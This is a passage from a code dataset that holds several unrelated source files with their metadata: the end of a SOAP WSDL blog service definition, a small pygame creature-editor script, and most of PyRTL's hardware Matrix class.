<wsdl:message name="UpdatePostSoapOut">
<wsdl:part name="parameters" element="tns:UpdatePostResponse"/>
</wsdl:message>
<wsdl:message name="DeletePostSoapIn">
<wsdl:part name="parameters" element="tns:DeletePost"/>
</wsdl:message>
<wsdl:message name="DeletePostSoapOut">
<wsdl:part name="parameters" element="tns:DeletePostResponse"/>
</wsdl:message>
<wsdl:portType name="BlogSoap">
<wsdl:operation name="AllPosts">
<wsdl:input message="tns:AllPostsSoapIn"/>
<wsdl:output message="tns:AllPostsSoapOut"/>
</wsdl:operation>
<wsdl:operation name="GetPost">
<wsdl:input message="tns:GetPostSoapIn"/>
<wsdl:output message="tns:GetPostSoapOut"/>
</wsdl:operation>
<wsdl:operation name="CreatePost">
<wsdl:input message="tns:CreatePostSoapIn"/>
<wsdl:output message="tns:CreatePostSoapOut"/>
</wsdl:operation>
<wsdl:operation name="UpdatePost">
<wsdl:input message="tns:UpdatePostSoapIn"/>
<wsdl:output message="tns:UpdatePostSoapOut"/>
</wsdl:operation>
<wsdl:operation name="DeletePost">
<wsdl:input message="tns:DeletePostSoapIn"/>
<wsdl:output message="tns:DeletePostSoapOut"/>
</wsdl:operation>
</wsdl:portType>
<wsdl:binding name="BlogSoap" type="tns:BlogSoap">
<soap:binding transport="http://schemas.xmlsoap.org/soap/http"/>
<wsdl:operation name="AllPosts">
<soap:operation soapAction="http://tempuri.org/AllPosts" style="document"/>
<wsdl:input>
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="GetPost">
<soap:operation soapAction="http://tempuri.org/GetPost" style="document"/>
<wsdl:input>
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="CreatePost">
<soap:operation soapAction="http://tempuri.org/CreatePost" style="document"/>
<wsdl:input>
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="UpdatePost">
<soap:operation soapAction="http://tempuri.org/UpdatePost" style="document"/>
<wsdl:input>
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="DeletePost">
<soap:operation soapAction="http://tempuri.org/DeletePost" style="document"/>
<wsdl:input>
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:binding name="BlogSoap12" type="tns:BlogSoap">
<soap12:binding transport="http://schemas.xmlsoap.org/soap/http"/>
<wsdl:operation name="AllPosts">
<soap12:operation soapAction="http://tempuri.org/AllPosts" style="document"/>
<wsdl:input>
<soap12:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap12:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="GetPost">
<soap12:operation soapAction="http://tempuri.org/GetPost" style="document"/>
<wsdl:input>
<soap12:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap12:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="CreatePost">
<soap12:operation soapAction="http://tempuri.org/CreatePost" style="document"/>
<wsdl:input>
<soap12:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap12:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="UpdatePost">
<soap12:operation soapAction="http://tempuri.org/UpdatePost" style="document"/>
<wsdl:input>
<soap12:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap12:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="DeletePost">
<soap12:operation soapAction="http://tempuri.org/DeletePost" style="document"/>
<wsdl:input>
<soap12:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap12:body use="literal"/>
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:service name="Blog">
<wsdl:port name="BlogSoap" binding="tns:BlogSoap">
<soap:address location="{0}/soap"/>
</wsdl:port>
<wsdl:port name="BlogSoap12" binding="tns:BlogSoap12">
<soap12:address location="{0}/soap"/>
</wsdl:port>
</wsdl:service>
</wsdl:definitions>""".format(request.host_url) # noqa
return wsdl
def trim_post_size(post):
text_limit = 500
if post.content and len(post.content) > text_limit:
post.content = post.content[:500]
if post.title and len(post.title) > text_limit:
post.title = post.title[:500]
if post.published and len(post.published) > text_limit:
post.published = post.published[:500]
|
mit
| 3,373,341,063,547,171,000
| 35.706861
| 503
| 0.632023
| false
| 3.304511
| false
| false
| false
|
zenieldanaku/DyDCreature_Editor
|
main.py
|
1
|
1129
|
from sys import exit
from pygame import display as pantalla, event
from pygame import init as py_init, quit as py_quit
from azoe.engine import EventHandler
from azoe.widgets import NamedValue
from backend.entidad import Entidad
py_init()
fondo = pantalla.set_mode((400, 400))
event.set_blocked([12, 13])
entity = Entidad()
initiative = NamedValue('Iniciativa')
initiative.rect.top = entity.caracteristicas['DES'].name.rect.bottom + 2
entity.iniciativa.valor.rect.topleft = initiative.rect.right + 2, initiative.rect.top
EventHandler.add_widget(initiative)
EventHandler.add_widget(entity.iniciativa.valor)
EventHandler.add_widget(entity.caracteristicas['DES'].name)
EventHandler.add_widget(entity.caracteristicas['DES'].punt)
EventHandler.add_widget(entity.caracteristicas['DES'].mod)
EventHandler.currentFocus = entity.caracteristicas['DES'].punt
hayCambios = True
while hayCambios:
fondo.fill((255, 255, 255))
entity.update()
events = event.get()
hayCambios = EventHandler.update(events, fondo)
if hayCambios:
pantalla.update(hayCambios)
py_quit()
exit()
|
mit
| -6,875,978,619,516,324,000
| 28.513514
| 85
| 0.741364
| false
| 2.986772
| false
| false
| false
|
UCSBarchlab/PyRTL
|
pyrtl/rtllib/matrix.py
|
1
|
54553
|
from functools import reduce
from six.moves import builtins
from pyrtl.rtllib import multipliers as mult
from ..wire import Const, WireVector
from ..corecircuits import as_wires, concat, select
from ..pyrtlexceptions import PyrtlError
from ..helperfuncs import formatted_str_to_val
class Matrix(object):
''' Class for making a Matrix using PyRTL.
Provides the ability to perform different matrix operations.
'''
# Internally, this class uses a Python matrix of WireVectors.
# So, a Matrix is represented as follows for a 2 x 2:
# [[WireVector, WireVector], [WireVector, WireVector]]
def __init__(self, rows, columns, bits, signed=False, value=None, max_bits=64):
''' Constructs a Matrix object.
:param int rows: the number of rows in the matrix. Must be greater than 0
:param int columns: the number of columns in the matrix. Must be greater than 0
:param int bits: The amount of bits per wirevector. Must be greater than 0
:param bool signed: Currently not supported (will be added in the future)
:param (WireVector/list) value: The value you want to initialize the Matrix with.
If a WireVector, must be of size `rows * columns * bits`. If a list, must have
`rows` rows and `columns` columns, and every element must fit in `bits` size.
If not given, the matrix initializes to 0
:param int max_bits: The maximum number of bits each wirevector can have, even
after operations like adding two matrices together results in larger
resulting wirevectors
:return: a constructed Matrix object
'''
if not isinstance(rows, int):
raise PyrtlError('Rows must be of type int, instead "%s" '
'was passed of type %s' %
(str(rows), type(rows)))
if rows <= 0:
raise PyrtlError('Rows cannot be less than or equal to zero. '
'Rows value passed: %s' % str(rows))
if not isinstance(columns, int):
raise PyrtlError('Columns must be of type int, instead "%s" '
'was passed of type %s' %
(str(columns), type(columns)))
if columns <= 0:
raise PyrtlError('Columns cannot be less than or equal to zero. '
'Columns value passed: %s' % str(columns))
if not isinstance(bits, int):
raise PyrtlError('Bits must be of type int, instead "%s" '
'was passed of type %s' %
(str(bits), type(bits)))
if bits <= 0:
raise PyrtlError(
'Bits cannot be negative or zero, '
'instead "%s" was passed' % str(bits))
if max_bits is not None:
if bits > max_bits:
bits = max_bits
self._matrix = [[0 for _ in range(columns)] for _ in range(rows)]
if value is None:
for i in range(rows):
for j in range(columns):
self._matrix[i][j] = Const(0)
elif isinstance(value, WireVector):
if value.bitwidth != bits * rows * columns:
raise PyrtlError('Initialized bitwidth value does not match '
'given value.bitwidth: %s, expected: %s'
'' % (str(value.bitwidth),
str(bits * rows * columns)))
for i in range(rows):
for j in range(columns):
start_index = (j * bits) + (i * columns * bits)
self._matrix[rows - i - 1][columns - j - 1] =\
as_wires(value[start_index:start_index + bits], bitwidth=bits)
elif isinstance(value, list):
if len(value) != rows or any(len(row) != columns for row in value):
raise PyrtlError('Rows and columns mismatch\n'
'Rows: %s, expected: %s\n'
'Columns: %s, expected: %s'
'' % (str(len(value)), str(rows),
str(len(value[0])), str(columns)))
for i in range(rows):
for j in range(columns):
self._matrix[i][j] = as_wires(value[i][j], bitwidth=bits)
else:
raise PyrtlError('Initialized value must be of type WireVector or '
'list. Instead was passed value of type %s' % (type(value)))
self.rows = rows
self.columns = columns
self._bits = bits
self.bits = bits
self.signed = False
self.max_bits = max_bits
@property
def bits(self):
''' Gets the number of bits each value is allowed to hold.
:return: an integer representing the number of bits
'''
return self._bits
@bits.setter
def bits(self, bits):
''' Sets the number of bits.
:param int bits: The number of bits. Must be greater than 0
Called automatically when bits is changed.
NOTE: This function will truncate the most significant bits.
'''
if not isinstance(bits, int):
raise PyrtlError('Bits must be of type int, instead "%s" '
'was passed of type %s' %
(str(bits), type(bits)))
if bits <= 0:
raise PyrtlError(
'Bits cannot be negative or zero, '
'instead "%s" was passed' % str(bits))
self._bits = bits
for i in range(self.rows):
for j in range(self.columns):
self._matrix[i][j] = self._matrix[i][j][:bits]
def __len__(self):
''' Gets the output WireVector length.
:return: an integer representing the output WireVector bitwidth
Used with default `len()` function
'''
return self.bits * self.rows * self.columns
def to_wirevector(self):
''' Outputs the PyRTL Matrix as a singular concatenated Wirevector.
:return: a Wirevector representing the whole PyRTL matrix
For instance, if we had a 2 x 1 matrix `[[wire_a, wire_b]]` it would
return the concatenated wire: `wire = wire_a.wire_b`
'''
result = []
for i in range(len(self._matrix)):
for j in range(len(self._matrix[0])):
result.append(as_wires(self[i, j], bitwidth=self.bits))
return as_wires(concat(*result), bitwidth=len(self))
def transpose(self):
''' Constructs the transpose of the matrix
:return: a Matrix object representing the transpose
'''
result = Matrix(self.columns, self.rows, self.bits, max_bits=self.max_bits)
for i in range(result.rows):
for j in range(result.columns):
result[i, j] = self[j, i]
return result
def __reversed__(self):
''' Constructs the reverse of matrix
:return: a Matrix object representing the reverse
Used with the reversed() method
'''
result = Matrix(self.rows, self.columns, self.bits, max_bits=self.max_bits)
for i in range(self.rows):
for j in range(self.columns):
result[i, j] = self[self.rows - 1 - i, self.columns - 1 - j]
return result
def __getitem__(self, key):
''' Accessor for the matrix.
:param (int/slice row, int/slice column) key: The key value to get
:return: WireVector or Matrix containing the value of key
Called when using square brackets ([]).
Examples::
int_matrix = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
matrix = Matrix.Matrix(3, 3, 4, value=int_matrix)
matrix[1] == [3, 4, 5]
matrix[2, 0] == 6
matrix[(2, 0)] = 6
matrix[slice(0, 2), slice(0, 3)] == [[0, 1, 2], [3, 4, 5]]
matrix[0:2, 0:3] == [[0, 1, 2], [3, 4, 5]]
matrix[:2] == [[0, 1, 2], [3, 4, 5]]
matrix[-1] == [6, 7, 8]
matrix[-2:] == [[3, 4, 5], [6, 7, 8]]
'''
if isinstance(key, tuple):
rows, columns = key
# First set up proper slice
if not isinstance(rows, slice):
if not isinstance(rows, int):
raise PyrtlError('Rows must be of type int or slice, '
'instead "%s" was passed of type %s' %
(str(rows), type(rows)))
if rows < 0:
rows = self.rows - abs(rows)
if rows < 0:
raise PyrtlError("Invalid bounds for rows. Max rows: %s, got: %s" % (
str(self.rows), str(rows)))
rows = slice(rows, rows + 1, 1)
if not isinstance(columns, slice):
if not isinstance(columns, int):
raise PyrtlError('Columns must be of type int or slice, '
'instead "%s" was passed of type %s' %
(str(columns), type(columns)))
if columns < 0:
columns = self.columns - abs(columns)
if columns < 0:
raise PyrtlError("Invalid bounds for columns. Max columns: %s, got: %s" % (
str(self.columns), str(columns)))
columns = slice(columns, columns + 1, 1)
if rows.start is None:
rows = slice(0, rows.stop, rows.step)
elif rows.start < 0:
rows = slice(self.rows - abs(rows.start),
rows.stop, rows.step)
if rows.stop is None:
rows = slice(rows.start, self.rows, rows.step)
elif rows.stop < 0:
rows = slice(rows.start, self.rows - abs(rows.stop),
rows.step)
rows = slice(rows.start, rows.stop, 1)
if columns.start is None:
columns = slice(0, columns.stop, columns.step)
elif columns.start < 0:
columns = slice(self.columns - abs(columns.start),
columns.stop, columns.step)
if columns.stop is None:
columns = slice(columns.start, self.columns, columns.step)
elif columns.stop < 0:
columns = slice(
columns.start, self.columns - abs(columns.stop),
columns.step)
columns = slice(columns.start, columns.stop, 1)
# Check slice bounds
if rows.start > self.rows or rows.stop > self.rows \
or rows.start < 0 or rows.stop < 0:
raise PyrtlError("Invalid bounds for rows. Max rows: %s, got: %s" % (
str(self.rows), str(rows.start) + ":" + str(rows.stop)))
if columns.start > self.columns or columns.stop > self.columns \
or columns.start < 0 or columns.stop < 0:
raise PyrtlError("Invalid bounds for columns. Max columns: %s, got: %s" % (
str(self.columns), str(columns.start) + ":" + str(columns.stop)))
# If it's a single value we want to return a wirevector
if rows.stop - rows.start == 1 and \
columns.stop - columns.start == 1:
return as_wires(self._matrix[rows][0][columns][0],
bitwidth=self.bits)
# Otherwise set up matrix and return that
result = [[0 for _ in range(columns.stop - columns.start)]
for _ in range(rows.stop - rows.start)]
for i in range(len(result)):
for j in range(len(result[0])):
result[i][j] = self._matrix[i + rows.start][j + columns.start]
return Matrix(len(result), len(result[0]), self._bits,
signed=self.signed, value=result, max_bits=self.max_bits)
# Second case when we just want to get full row
if isinstance(key, int):
if key < 0:
start = self.rows - abs(key)
if start < 0:
raise PyrtlError('Index %d is out of bounds for '
'matrix with %d rows' % (key, self.rows))
key = slice(start, start + 1, None)
else:
key = slice(key, key + 1, None)
return self[key, :]
# Third case when we want multiple rows
if isinstance(key, slice):
return self[key, :]
# Otherwise improper value was passed
raise PyrtlError('Rows must be of type int or slice, '
'instead "%s" was passed of type %s' %
(str(key), type(key)))
def __setitem__(self, key, value):
''' Mutator for the matrix.
:param (slice/int rows, slice/int columns) key: The key value to set
:param Wirevector/int/Matrix value: The value in which to set the key
Called when setting a value using square brackets (e.g. `matrix[a, b] = value`).
The value given will be truncated to match the bitwidth of all the elements
in the matrix.
'''
if isinstance(key, tuple):
rows, columns = key
# First ensure that slices are correct
if not isinstance(rows, slice):
if not isinstance(rows, int):
raise PyrtlError('Rows must be of type int or slice, '
'instead "%s" was passed of type %s' %
(str(rows), type(rows)))
rows = slice(rows, rows + 1, 1)
if not isinstance(columns, slice):
if not isinstance(columns, int):
raise PyrtlError('Columns must be of type int or slice, '
'instead "%s" was passed of type %s' %
(str(columns), type(columns)))
columns = slice(columns, columns + 1, 1)
if rows.start is None:
rows = slice(0, rows.stop, rows.step)
elif rows.start < 0:
rows = slice(self.rows - abs(rows.start),
rows.stop, rows.step)
if rows.stop is None:
rows = slice(rows.start, self.rows, rows.step)
elif rows.stop < 0:
rows = slice(rows.start, self.rows - abs(rows.stop),
rows.step)
if columns.start is None:
columns = slice(0, columns.stop, columns.step)
elif columns.start < 0:
columns = slice(self.columns - abs(columns.start),
columns.stop, columns.step)
if columns.stop is None:
columns = slice(columns.start, self.columns, columns.step)
elif columns.stop < 0:
columns = slice(
columns.start, self.columns - abs(columns.stop),
columns.step)
# Check Slice Bounds
if rows.start > self.rows or rows.stop > self.rows \
or rows.start < 0 or rows.stop < 0:
raise PyrtlError("Invalid bounds for rows. Max rows: %s, got: %s" % (
str(self.rows), str(rows.start) + ":" + str(rows.stop)))
if columns.start > self.columns or columns.stop > self.columns \
or columns.start < 0 or columns.stop < 0:
raise PyrtlError("Invalid bounds for columns. Max columns: %s, got: %s" % (
str(self.columns), str(columns.start) + ":" + str(columns.stop)))
# First case when setting value to Matrix
if isinstance(value, Matrix):
if value.rows != (rows.stop - rows.start):
raise PyrtlError(
'Value rows mismatch. Expected Matrix '
'of rows "%s", instead recieved Matrix of rows "%s"' %
(str(rows.stop - rows.start), str(value.rows)))
if value.columns != (columns.stop - columns.start):
raise PyrtlError(
'Value columns mismatch. Expected Matrix '
'of columns "%s", instead recieved Matrix of columns "%s"' %
(str(columns.stop - columns.start), str(value.columns)))
for i in range(rows.stop - rows.start):
for j in range(columns.stop - columns.start):
self._matrix[rows.start + i][columns.start + j] =\
as_wires(value[i, j], bitwidth=self.bits)
# Second case when setting value to wirevector
elif isinstance(value, (int, WireVector)):
if ((rows.stop - rows.start) != 1) or \
((columns.stop - columns.start) != 1):
raise PyrtlError(
'Value mismatch: expected Matrix, instead received WireVector')
self._matrix[rows.start][columns.start] = as_wires(value, bitwidth=self.bits)
# Otherwise Error
else:
raise PyrtlError('Invalid value of type %s' % type(value))
else:
# Second case if we just want to set a full row
if isinstance(key, int):
if key < 0:
start = self.rows - abs(key)
if start < 0:
raise PyrtlError('Index %d is out of bounds for '
'matrix with %d rows' % (key, self.rows))
key = slice(start, start + 1, None)
else:
key = slice(key, key + 1, None)
self[key, :] = value
# Third case if we want to set full rows
elif isinstance(key, slice):
self[key, :] = value
else:
raise PyrtlError('Rows must be of type int or slice, '
'instead "%s" was passed of type %s' %
(str(key), type(key)))
def copy(self):
''' Constructs a deep copy of the Matrix.
:return: a Matrix copy
'''
return Matrix(self.rows, self.columns, self.bits,
value=self.to_wirevector(), max_bits=self.max_bits)
def __iadd__(self, other):
''' Perform the in-place addition operation.
:return: a Matrix object with the elementwise addition being preformed
Is used with `a += b`. Performs an elementwise addition.
'''
new_value = (self + other)
self._matrix = new_value._matrix
self.bits = new_value._bits
return self.copy()
def __add__(self, other):
''' Perform the addition operation.
:return: a Matrix object with the element wise addition being performed
Is used with `a + b`. Performs an elementwise addition.
'''
if not isinstance(other, Matrix):
raise PyrtlError('error: expecting a Matrix, '
'got %s instead' % type(other))
if self.columns != other.columns:
raise PyrtlError('error: columns mismatch. '
'Matrix a: %s columns, Matrix b: %s rows' %
(str(self.columns), str(other.columns)))
elif self.rows != other.rows:
raise PyrtlError('error: row mismatch. '
'Matrix a: %s columns, Matrix b: %s column' %
(str(self.rows), str(other.rows)))
new_bits = self.bits
if other.bits > new_bits:
new_bits = other.bits
result = Matrix(self.rows, self.columns, new_bits + 1, max_bits=self.max_bits)
for i in range(result.rows):
for j in range(result.columns):
result[i, j] = self[i, j] + other[i, j]
return result
def __isub__(self, other):
''' Perform the inplace subtraction opperation.
:Matrix other: the PyRTL Matrix to subtract
:return: a Matrix object with the element wise subtraction being performed
Is used with `a -= b`. Performs an elementwise subtraction.
'''
new_value = self - other
self._matrix = new_value._matrix
self._bits = new_value._bits
return self.copy()
def __sub__(self, other):
''' Perform the subtraction operation.
:Matrix other: the PyRTL Matrix to subtract
:return: a Matrix object with the elementwise subtraction being performed
Is used with `a - b`. Performs an elementwise subtraction.
Note: If using unsigned numbers, the result will be floored at 0.
'''
if not isinstance(other, Matrix):
raise PyrtlError('error: expecting a Matrix, '
'got %s instead' % type(other))
if self.columns != other.columns:
raise PyrtlError('error: columns mismatch. '
'Matrix a: %s columns, Matrix b: %s rows' %
(str(self.columns), str(other.columns)))
if self.rows != other.rows:
raise PyrtlError('error: row mismatch. '
'Matrix a: %s columns, Matrix b: %s column' %
(str(self.rows), str(other.rows)))
new_bits = self.bits
if other.bits > new_bits:
new_bits = other.bits
result = Matrix(self.rows, self.columns, new_bits, max_bits=self.max_bits)
for i in range(result.rows):
for j in range(result.columns):
if self.signed:
result[i, j] = self[i, j] - other[i, j]
else:
result[i, j] = select(self[i, j] > other[i, j],
self[i, j] - other[i, j],
Const(0))
return result
def __imul__(self, other):
''' Perform the in-place multiplication operation.
:param Matrix/Wirevector other: the Matrix or scalar to multiply
:return: a Matrix object with the resulting multiplication operation being preformed
Is used with `a *= b`. Performs an elementwise or scalar multiplication.
'''
new_value = self * other
self._matrix = new_value._matrix
self._bits = new_value._bits
return self.copy()
def __mul__(self, other):
''' Perform the elementwise or scalar multiplication operation.
:param Matrix/Wirevector other: the Matrix to multiply
:return: a Matrix object with the resulting multiplication operation being performed
Is used with `a * b`.
'''
if isinstance(other, Matrix):
if self.columns != other.columns:
raise PyrtlError('error: columns mismatch. '
'Martrix a: %s columns, Matrix b: %s rows' %
(str(self.columns), str(other.columns)))
if self.rows != other.rows:
raise PyrtlError('error, row mismatch '
'Martrix a: %s columns, Matrix b: %s column' %
(str(self.rows), str(other.rows)))
bits = self.bits + other.bits
elif isinstance(other, WireVector):
bits = self.bits + len(other)
else:
raise PyrtlError('Expecting a Matrix or WireVector '
'got %s instead' % type(other))
result = Matrix(self.rows, self.columns, bits, max_bits=self.max_bits)
for i in range(self.rows):
for j in range(self.columns):
if isinstance(other, Matrix):
result[i, j] = self[i, j] * other[i, j]
else:
result[i, j] = self[i, j] * other
return result
def __imatmul__(self, other):
''' Performs the inplace matrix multiplication operation.
:param Matrix other: the second matrix.
:return: a PyRTL Matrix that contains the matrix multiplication product of this and other
Is used with `a @= b`.
Note: The matmul symbol (@) only works in python 3.5+. Otherwise you must
call `__imatmul__(other)`.
'''
new_value = self.__matmul__(other)
self.columns = new_value.columns
self.rows = new_value.rows
self._matrix = new_value._matrix
self._bits = new_value._bits
return self.copy()
def __matmul__(self, other):
''' Performs the matrix multiplication operation.
:param Matrix other: the second matrix.
:return: a PyRTL Matrix that contains the matrix multiplication product of this and other
Is used with `a @ b`.
Note: The matmul symbol (@) only works in python 3.5+. Otherwise you must
call `__matmul__(other)`.
'''
if not isinstance(other, Matrix):
raise PyrtlError('error: expecting a Matrix, '
'got %s instead' % type(other))
if self.columns != other.rows:
raise PyrtlError('error: rows and columns mismatch. '
'Matrix a: %s columns, Matrix b: %s rows' %
(str(self.columns), str(other.rows)))
result = Matrix(self.rows, other.columns,
self.columns * other.rows * (self.bits + other.bits),
max_bits=self.max_bits)
for i in range(self.rows):
for j in range(other.columns):
for k in range(self.columns):
result[i, j] = mult.fused_multiply_adder(
self[i, k], other[k, j], result[i, j], signed=self.signed)
return result
def __ipow__(self, power):
''' Performs the matrix power operation.
:param int power: the power to perform the matrix on
:return: a PyRTL Matrix that contains the matrix power product
Is used with `a **= b`.
'''
new_value = self ** power
self._matrix = new_value._matrix
self._bits = new_value._bits
return self.copy()
def __pow__(self, power):
''' Performs the matrix power operation.
:param int power: the power to perform the matrix on
:return: a PyRTL Matrix that contains the matrix power product
Is used with `a ** b`.
'''
if not isinstance(power, int):
raise PyrtlError('Unexpected power given. Type int expected, '
'but recieved type %s' % type(power))
if self.rows != self.columns:
raise PyrtlError("Matrix must be square")
result = self.copy()
# First case: return identity matrix
if power == 0:
for i in range(self.rows):
for j in range(self.columns):
if i != j:
result[i, j] = Const(0)
else:
result[i, j] = Const(1)
return result
# Second case: do matrix multiplications
if power >= 1:
inputs = [result] * power
def pow_2(first, second):
return first.__matmul__(second)
return reduce(pow_2, inputs)
raise PyrtlError('Power must be greater than or equal to 0')
def put(self, ind, v, mode='raise'):
''' Replace specified elements of the matrix with given values
:param int/list[int]/tuple[int] ind: target indices
:param int/list[int]/tuple[int]/Matrix row-vector v: values to place in
matrix at target indices; if v is shorter than ind, it is repeated as necessary
:param str mode: how out-of-bounds indices behave; 'raise' raises an
error, 'wrap' wraps aoround, and 'clip' clips to the range
Note that the index is on the flattened matrix.
'''
count = self.rows * self.columns
if isinstance(ind, int):
ind = (ind,)
elif not isinstance(ind, (tuple, list)):
raise PyrtlError("Expected int or list-like indices, got %s" % type(ind))
if isinstance(v, int):
v = (v,)
if isinstance(v, (tuple, list)) and len(v) == 0:
return
elif isinstance(v, Matrix):
if v.rows != 1:
raise PyrtlError(
"Expected a row-vector matrix, instead got matrix with %d rows" % v.rows
)
if mode not in ['raise', 'wrap', 'clip']:
raise PyrtlError(
"Unexpected mode %s; allowable modes are 'raise', 'wrap', and 'clip'" % mode
)
def get_ix(ix):
if ix < 0:
ix = count - abs(ix)
if ix < 0 or ix >= count:
if mode == 'raise':
raise PyrtlError("index %d is out of bounds with size %d" % (ix, count))
elif mode == 'wrap':
ix = ix % count
elif mode == 'clip':
ix = 0 if ix < 0 else count - 1
return ix
def get_value(ix):
if isinstance(v, (tuple, list)):
if ix >= len(v):
return v[-1] # if v is shorter than ind, repeat last as necessary
return v[ix]
elif isinstance(v, Matrix):
if ix >= count:
return v[0, -1]
return v[0, ix]
for v_ix, mat_ix in enumerate(ind):
mat_ix = get_ix(mat_ix)
row = mat_ix // self.columns
col = mat_ix % self.columns
self[row, col] = get_value(v_ix)
def reshape(self, *newshape, order='C'):
''' Create a matrix of the given shape from the current matrix.
:param int/ints/tuple[int] newshape: shape of the matrix to return;
if a single int, will result in a 1-D row-vector of that length;
if a tuple, will use values for number of rows and cols. Can also
be a varargs.
:param str order: 'C' means to read from self using
row-major order (C-style), and 'F' means to read from self
using column-major order (Fortran-style).
:return: A copy of the matrix with same data, with a new number of rows/cols
One shape dimension in newshape can be -1; in this case, the value
for that dimension is inferred from the other given dimension (if any)
and the number of elements in the matrix.
Examples::
int_matrix = [[0, 1, 2, 3], [4, 5, 6, 7]]
matrix = Matrix.Matrix(2, 4, 4, value=int_matrix)
matrix.reshape(-1) == [[0, 1, 2, 3, 4, 5, 6, 7]]
matrix.reshape(8) == [[0, 1, 2, 3, 4, 5, 6, 7]]
matrix.reshape(1, 8) == [[0, 1, 2, 3, 4, 5, 6, 7]]
matrix.reshape((1, 8)) == [[0, 1, 2, 3, 4, 5, 6, 7]]
matrix.reshape((1, -1)) == [[0, 1, 2, 3, 4, 5, 6, 7]]
matrix.reshape(4, 2) == [[0, 1], [2, 3], [4, 5], [6, 7]]
matrix.reshape(-1, 2) == [[0, 1], [2, 3], [4, 5], [6, 7]]
matrix.reshape(4, -1) == [[0, 1], [2, 3], [4, 5], [6, 7]]
'''
count = self.rows * self.columns
if isinstance(newshape, int):
if newshape == -1:
newshape = (1, count)
else:
newshape = (1, newshape)
elif isinstance(newshape, tuple):
if isinstance(newshape[0], tuple):
newshape = newshape[0]
if len(newshape) == 1:
newshape = (1, newshape[0])
if len(newshape) > 2:
raise PyrtlError("length of newshape tuple must be <= 2")
rows, cols = newshape
if not isinstance(rows, int) or not isinstance(cols, int):
raise PyrtlError(
"newshape dimensions must be integers, instead got %s" % type(newshape)
)
if rows == -1 and cols == -1:
raise PyrtlError("Both dimensions in newshape cannot be -1")
if rows == -1:
rows = count // cols
newshape = (rows, cols)
elif cols == -1:
cols = count // rows
newshape = (rows, cols)
else:
raise PyrtlError(
"newshape can be an integer or tuple of integers, not %s" % type(newshape)
)
rows, cols = newshape
if rows * cols != count:
raise PyrtlError(
"Cannot reshape matrix of size %d into shape %s" % (count, str(newshape))
)
if order not in 'CF':
raise PyrtlError(
"Invalid order %s. Acceptable orders are 'C' (for row-major C-style order) "
"and 'F' (for column-major Fortran-style order)." % order
)
value = [[0] * cols for _ in range(rows)]
ix = 0
if order == 'C':
# Read and write in row-wise order
for newr in range(rows):
for newc in range(cols):
r = ix // self.columns
c = ix % self.columns
value[newr][newc] = self[r, c]
ix += 1
else:
# Read and write in column-wise order
for newc in range(cols):
for newr in range(rows):
r = ix % self.rows
c = ix // self.rows
value[newr][newc] = self[r, c]
ix += 1
return Matrix(rows, cols, self.bits, self.signed, value, self.max_bits)
def flatten(self, order='C'):
''' Flatten the matrix into a single row.
:param str order: 'C' means row-major order (C-style), and
'F' means column-major order (Fortran-style)
:return: A copy of the matrix flattened in to a row vector matrix
'''
return self.reshape(self.rows * self.columns, order=order)
def multiply(first, second):
''' Perform the elementwise or scalar multiplication operation.
:param Matrix first: first matrix
:param Matrix/Wirevector second: second matrix
:return: a Matrix object with the element wise or scaler multiplication being performed
'''
if not isinstance(first, Matrix):
raise PyrtlError('error: expecting a Matrix, '
'got %s instead' % type(second))
return first * second
def sum(matrix, axis=None, bits=None):
''' Returns the sum of all the values in a matrix
:param Matrix/Wirevector matrix: the matrix to perform sum operation on.
If it is a WireVector, it will return itself
:param None/int axis: The axis to perform the operation on
None refers to sum of all item. 0 is sum of column. 1 is sum of rows. Defaults to None
:param int bits: The bits per value of the sum. Defaults to bits of old matrix
:return: A wirevector or Matrix representing sum
'''
def sum_2(first, second):
return first + second
if isinstance(matrix, WireVector):
return matrix
if not isinstance(matrix, Matrix):
raise PyrtlError('error: expecting a Matrix or Wirevector for matrix, '
'got %s instead' % type(matrix))
if not isinstance(bits, int) and bits is not None:
raise PyrtlError('error: expecting an int/None for bits, '
'got %s instead' % type(bits))
if not isinstance(axis, int) and axis is not None:
raise PyrtlError('error: expecting an int or None for axis, '
'got %s instead' % type(axis))
if bits is None:
bits = matrix.bits
if bits <= 0:
raise PyrtlError('error: bits cannot be negative or zero, '
'got %s instead' % bits)
if axis is None:
inputs = []
for i in range(matrix.rows):
for j in range(matrix.columns):
inputs.append(matrix[i, j])
return reduce(sum_2, inputs)
if axis == 0:
result = Matrix(1, matrix.columns, signed=matrix.signed, bits=bits)
for i in range(matrix.columns):
inputs = []
for j in range(matrix.rows):
inputs.append(matrix[j, i])
result[0, i] = reduce(sum_2, inputs)
return result
if axis == 1:
result = Matrix(1, matrix.rows, signed=matrix.signed, bits=bits)
for i in range(matrix.rows):
inputs = []
for j in range(matrix.columns):
inputs.append(matrix[i, j])
result[0, i] = reduce(sum_2, inputs)
return result
raise PyrtlError('Axis invalid: expected (None, 0, or 1), got %s' % axis)
def min(matrix, axis=None, bits=None):
''' Returns the minimum value in a matrix.
:param Matrix/Wirevector matrix: the matrix to perform min operation on.
If it is a WireVector, it will return itself
:param None/int axis: The axis to perform the operation on
None refers to min of all item. 0 is min of column. 1 is min of rows. Defaults to None
:param int bits: The bits per value of the min. Defaults to bits of old matrix
:return: A WireVector or Matrix representing the min value
'''
def min_2(first, second):
return select(first < second, first, second)
